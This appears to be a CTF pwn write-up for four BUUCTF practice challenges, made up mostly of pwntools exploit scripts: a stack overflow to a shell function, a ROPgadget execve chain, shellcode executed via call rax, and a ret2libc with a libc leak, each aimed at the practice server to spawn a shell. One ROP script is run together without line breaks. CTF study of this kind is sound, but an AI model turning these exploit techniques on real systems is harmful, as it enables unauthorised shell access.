PWN-PRACTICE-BUUCTF-13
- [ZJCTF 2019]Login
- inndy_rop
- mrctf2020_shellcode
- jarvisoj_level1
[ZJCTF 2019]Login
参考:ZJCTF 2019 Pwn
from pwn import *
io=remote('node4.buuoj.cn',27513)
#io = process("./login")
shell = 0x400e88
io.recvuntil("username: ")
io.sendline("admin")
io.recvuntil("password: ")
payload="2jctf_pa5sw0rd"+"\x00"*58+p64(shell)
io.sendline(payload)
io.interactive()
inndy_rop
静态链接的32位elf,用ROPgadget直接找一条rop链
ROPgadget --binary inndy_rop --ropchain
from pwn import *
from struct import pack
#io=process('./inndy_rop')
io=remote('node4.buuoj.cn',25930)
def ROPchain():p = 'a'*(0xc+4)p += pack('<I', 0x0806ecda) # pop edx ; retp += pack('<I', 0x080ea060) # @ .datap += pack('<I', 0x080b8016) # pop eax ; retp += '/bin'p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; retp += pack('<I', 0x0806ecda) # pop edx ; retp += pack('<I', 0x080ea064) # @ .data + 4p += pack('<I', 0x080b8016) # pop eax ; retp += '//sh'p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; retp += pack('<I', 0x0806ecda) # pop edx ; retp += pack('<I', 0x080ea068) # @ .data + 8p += pack('<I', 0x080492d3) # xor eax, eax ; retp += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; retp += pack('<I', 0x080481c9) # pop ebx ; retp += pack('<I', 0x080ea060) # @ .datap += pack('<I', 0x080de769) # pop ecx ; retp += pack('<I', 0x080ea068) # @ .data + 8p += pack('<I', 0x0806ecda) # pop edx ; retp += pack('<I', 0x080ea068) # @ .data + 8p += pack('<I', 0x080492d3) # xor eax, eax ; retp += pack('<I', 0x0807a66f) # inc eax ; retp += pack('<I', 0x0807a66f) # inc eax ; retp += pack('<I', 0x0807a66f) # inc eax ; retp += pack('<I', 0x0807a66f) # inc eax ; retp += pack('<I', 0x0807a66f) # inc eax ; retp += pack('<I', 0x0807a66f) # inc eax ; retp += pack('<I', 0x0807a66f) # inc eax ; retp += pack('<I', 0x0807a66f) # inc eax ; retp += pack('<I', 0x0807a66f) # inc eax ; retp += pack('<I', 0x0807a66f) # inc eax ; retp += pack('<I', 0x0807a66f) # inc eax ; retp += pack('<I', 0x0806c943) # int 0x80return p
payload=ROPchain()
io.sendline(payload)
io.interactive()
mrctf2020_shellcode
在偏移0x00000000000011DD处有条call rax的gadget,这里的rax就是我们输入内容的地址
于是这道题直接输入shellcode,elf执行call rax即可getshell
from pwn import *
context.arch='amd64'
context.os='linux'
#io=process('./mrctf2020_shellcode')
io=remote('node4.buuoj.cn',29514)
shellcode=asm(shellcraft.sh())
io.recvuntil('magic!\n')
io.sendline(shellcode)
io.interactive()
jarvisoj_level1
32位elf的栈溢出,ret2libc
from pwn import *
#context.log_level = 'debug'
#p = process('./jarvisoj_level1')
p=remote('node4.buuoj.cn',25340)
elf = ELF('./jarvisoj_level1')
libc=ELF('./libc-2.23-x32.so')
write_plt=elf.plt['write']
write_got=elf.got['write']
main_addr=elf.symbols['main']
payload1='A'*140+p32(write_plt)+p32(main_addr)+p32(1)+p32(write_got)+p32(4)
p.sendline(payload1)
write_addr = u32(p.recv(4))
print('write addr: '+hex(write_addr))
libc_base=write_addr-libc.sym['write']
system=libc_base+libc.sym['system']
binsh=libc_base+libc.search('/bin/sh\x00').next()
payload='A'*140+p32(system)+p32(0)+p32(binsh)
p.sendline(payload)
p.interactive()